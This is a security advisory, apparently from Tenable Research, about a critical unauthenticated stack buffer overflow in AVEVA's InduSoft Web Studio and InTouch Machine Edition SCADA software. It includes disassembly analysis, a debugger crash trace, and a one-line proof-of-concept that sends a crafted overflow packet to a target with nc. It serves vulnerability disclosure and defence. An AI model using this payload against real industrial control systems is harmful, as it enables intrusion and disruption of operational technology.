Tenable Research Advisory: Patches Issued For Critical Vulnerabilities in 2 AVEVA SCADA/OT Apps

Tenable Research

A new critical remote code execution vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition can be exploited to compromise sensitive operational technology. AVEVA has released a patch and we advise urgent attention and response from affected end users.

Tenable Research discovered a new critical remote code execution (RCE) vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition. The applications contain a stack buffer overflow that can be exploited to execute arbitrary code on target systems.

These products were previously marketed under the Schneider Electric brand and are now being managed by AVEVA.

What do you need to know? Tenable Research discovered a new critical remote code execution vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition.

What's the attack vector? The vulnerability can be remotely exploited without authentication to execute arbitrary commands on the target system.

What's the business impact? A malicious threat actor can completely compromise and gain control of the system, and use it as a pivot point to execute lateral transfer.

What's the solution? AVEVA has released InduSoft Web Studio Hotfix 81.1.00.08 and InTouch Machine Edition Hotfix 81.1.00.08 to address this vulnerability. Affected users should urgently apply the patches.

Background

InduSoft Web Studio is a suite of tools providing automation building blocks which are used to develop human-machine interfaces (HMIs), Supervisory Control and Data Acquisition (SCADA) systems and embedded instrumentation solutions.

InTouch Machine Edition is an HMI/SCADA software toolset used to develop applications that connect automation systems and interfaces for web browsers, smartphones and tablets.

Diverse industries -- including agriculture, transportation, energy, nuclear power, manufacturing, entertainment and physical security -- use SCADA in conjunction with operational technology (OT). Because of their critical role in modern infrastructure and the wide range of industries that deploy them, SCADA systems have become a primary security concern and are increasingly being targeted by threat actors.

Analysis

Tenable Research found a new stack overflow vulnerability in TCPServer.dll. The vulnerability is in the code to read a 'string' from the received network data. This vulnerability is similar to the one we disclosed in May 2018, but is triggered through command 81 instead of  command 50.

Here’s a description of two data structures in TCPServer.dll to help you understand the vulnerability.

  • The following object (referred here as 'WSTR') is used to store a wide-character string:
  •  Class WSTR
     {
     vftable;
     unsigned short lbuf[0x40]; // local storage for the string data
     void *pData; // ptr to string data; can point to @lbuf
     int32 DataLen; // length allocated for @pData
     ...
     };
    

     When the string can fit in lbuf, it should be stored there. Otherwise, heap memory is allocated to store the string.

  • Another object heavily used in TCPServer.dll is the 'TcpServerThreadBuffer' (referred to here as CBuf). This object is used to store, process and manipulate network data received from clients.
  • Class CBuf
    {
     vftable;
     int32 AllocSize; // used for allocation, seen: 0x4000
     int32 CurPos; // current position
     int32 BufSize; // allocated size of @pBuffer
     void *pBuffer; // buffer holding network data; can point to @lbuf
     byte lbuf[0x100]; // local storage for network data
     ...
    };
    


    Inside the virtual function table, there are many functions used to read and write various types of command parameters (i.e., byte, boolean, short, int32 and string).

    The vulnerability can be triggered via command 81:

    [...]
    .text:5D43D8B8      xor     eax, eax
    .text:5D43D8BA      mov     [ebp+var_wstr.vftable], offset off_5D4CAD5C
    .text:5D43D8C4      mov     word ptr [ebp+var_wstr.lbuf], ax ; wstr.lbuf[0] = '\0';
    .text:5D43D8CB      mov     [ebp+var_wstr.pData], eax ; wstr.pData = NULL;
    .text:5D43D8D1      mov     [ebp+var_wstr.DataLen], eax ; wstr.DataLen = 0;
    .text:5D43D8D7      lea     ecx, [ebp+var_wstr]; a wstr object on the stack
    .text:5D43D8DD      mov     [ebp+var_4], eax
    .text:5D43D8E0      mov     eax, [edi]
    .text:5D43D8E2      push    ecx
    .text:5D43D8E3      mov     ecx, edi
    .text:5D43D8E5      call    [eax+vftCBuf.Cbuf_ReadString] ; Cbuf_ReadString
    [...]
    


    Here, the code tries to read a 'string' object from the network data into a WSTR object (which is on the stack). This means wstr.lbuf is a buffer on the stack.

    Inside Cbuf_ReadString(), the length of the 'string' object is read, and the function tries to allocate str_len + 1 to store the string:

    [...]
    .text:5D40C05D      call    Cbuf_ReadStringLength ; return  1, 2, or 4 byte(s)
    .text:5D40C062      mov     esi, [ebp+arg_sbuf]
    .text:5D40C065      mov     edi, eax ; attacker specifies length 0xffffffff
    .text:5D40C067      mov     ecx, esi
    .text:5D40C069      lea     edx, [edi+1] ; length wraps to 0 if 0xffffffff
    .text:5D40C06C      push    edx
    .text:5D40C06D      call    wstr_alloc
    [...]
    


    If the attacker specifies 0xFFFFFFFF as the string length, alloc size of 0 is passed to wstr_alloc(), which increments the size by one and checks if the size can fit in the local buffer (wstr.lbuf). Since 1 (0 + 1) is less than 0x40 (countof(wstr.lbuf)), the function returns 1 without allocating heap memory, asssuming wstr.lbuf is big enough to store the string:

    [...]
    .text:5D40BDD4      mov     edx, [ebp+arg_size]
    .text:5D40BDD7      inc     edx ; size++
    .text:5D40BDD8      push    edi
    .text:5D40BDD9      mov     edi, ecx
    .text:5D40BDDB      mov     [ebp+arg_size], edx
    .text:5D40BDDE      cmp     edx, 40h
    .text:5D40BDE1      jge     short loc_5D40BDEF
    .text:5D40BDE3      mov     eax, 1
    [...]
    


    Then Cbuf_ReadString() calls a Cbuf method to read in the string data, telling it the stack buffer has 0xffffffff bytes

    [...]
    .text:5D40C09C      push    edi ; 0xffffffff
    .text:5D40C09D      push    ecx ; stack buf
    .text:5D40C09E      mov     ecx, ebx
    .text:5D40C0A0      call    [eax+vftCBuf.ReadAndConvertToWchars] ; stack overflow!
    [...]
    


    which can cause a stack buffer overflow:

    STATUS_STACK_BUFFER_OVERRUN encountered
    (9e8.b28): Break instruction exception - code 80000003 (first chance)
    eax=00000000 ebx=5d15b708 ecx=766ce4b4 edx=0e76efb9 esi=00000000 edi=00ec2870
    eip=766ce331 esp=0e76f200 ebp=0e76f27c iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
    kernel32!UnhandledExceptionFilter+0x5f:
    766ce331 cc              int     3
    0:020> kb
     # ChildEBP RetAddr  Args to Child              
    00 0e76f27c 694c00f1 5d15b708 0e76f298 5d133403 kernel32!UnhandledExceptionFilter+0x5f
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\InduSoft Web Studio v8.1\Bin\TCPSERVER.DLL - 
    01 0e76f288 5d133403 5d15b708 00000001 0e76f5c8 MSVCR110!__crtUnhandledException+0x14
    WARNING: Stack unwind information not available. Following frames may be wrong.
    02 0e76f298 5d13351a 5d15b708 00000010 00000044 TCPSERVER!_StudioSetLanguage__+0x1653
    03 0e76f5c8 5d0bdbff 049ecae8 049ecb18 049ecb18 TCPSERVER!_StudioSetLanguage__+0x176a
    04 0e76f7ec 00410041 00410041 00410041 00410041 TCPSERVER+0x3dbff
    05 0e76f7f0 00410041 00410041 00410041 00410041 0x410041
    06 0e76f7f4 00410041 00410041 00410041 00410041 0x410041
    07 0e76f7f8 00410041 00410041 00410041 00410041 0x410041
    [...]
    

    Proof of Concept (PoC)

    Below is the PoC to trigger the stack buffer overflow:

    cat < (echo -ne '\x02\x31\x10\x31\x10\x38\x10\x32\x10\x32\x03\x02\x51\xff\xff\xff\xff\xff\xff\xff'`python -c "print 'A'*1000"`'\x03') - | nc <target_host> 1234
    

    Business impact

    These vulnerabilities leave InduSoft Web Studio or InTouch Machine Edition server machines vulnerable to an unauthenticated remote attacker who could leverage them to execute arbitrary code, potentially leading to full system compromise. In turn, these machines could allow an attacker to move laterally within a network. Connected HMI clients and OT devices can also be exposed to attacks.

    AVEVA and Tenable consider this a critical vulnerability requiring urgent attention and response from affected end users.

    Solution

    AVEVA has released updates InduSoft Web Studio Hotfix 81.1.00.08 and InTouch Machine Edition Hotfix 81.1.00.08 to remediate this vulnerability. Update the application by applying the appropriate patches:

    Additional information

    Read more >

    Published on Jul 18, 2018

    People also viewed

    API Delivery Engineer

    Uxbridge United Kingdom Furzeground Way , Stockley Park, Uxbridge, United Kingdom, UB11 1EZ Professional Services Professional Services
    Your Role:Assist in the deployment and configuration of Tenable solutions within client organisations. The consultant will provide technical support, preparation and documentation to clients as part of a small delivery team. The consultant will in...

    Principal Research Engineer

    Paris Paris France Paris, France Sensors Research & Development
    Your Opportunity:As the Cyber Exposure market leader Tenable is looking for a passionate and talented Principal Researcher for its Tenable Research team. Tenable Research is significant and growing global security research team consisting of rever...

    Security Consultant - API

    North Sydney Australia Pacific Highway, North Sydney, Australia, NSW 2060 Professional Services Professional Services
    Your Role:Tenable’s Global Professional Services organization performs Tenable product installation, configuration, customizations, and security audits for our clients, and is looking to hire a security consultant with expertise developing scripts...

    Field Product Manager

    Seattle Washington United States 5th Ave, Seattle, Washington, United States, 98101 Product Management Research & Development
    Your Role:The Field Product Manager  supports and works with Product Management, Engineering, Product Marketing, Sales, and other internal teams to guide on how Tenable products and services could be used to best suit customer needs. This supporti...

    Technical Product Manager - Cloud Services

    New York New York United States Broadway, New York, United States, 10012 Product Management Research & Development
    Your Role:Tenable is looking for a Technical Product Manager - Cloud Services, responsible for driving the product strategy and management of our cloud services, platform infrastructure, and public APIs. This full-stack PMrole is expected to be sk...

    Sr. UI Engineer

    Los Angeles California United States West Jefferson Boulevard, Playa Vista, Los Angeles, California, United States, 90066 Cloud Platforms Research & Development
    Your Role:Tenable is looking for an extraordinary Senior UI Engineer to join the Tenable.io Engineering team. This is an opportunity to make a high impact while helping the team deliver on a next-generation enterprise web application. The ideal ca...

    We have big plans for continued global growth, and we’re looking for people who are creative, flexible and dedicated to helping us build something great – something that matters.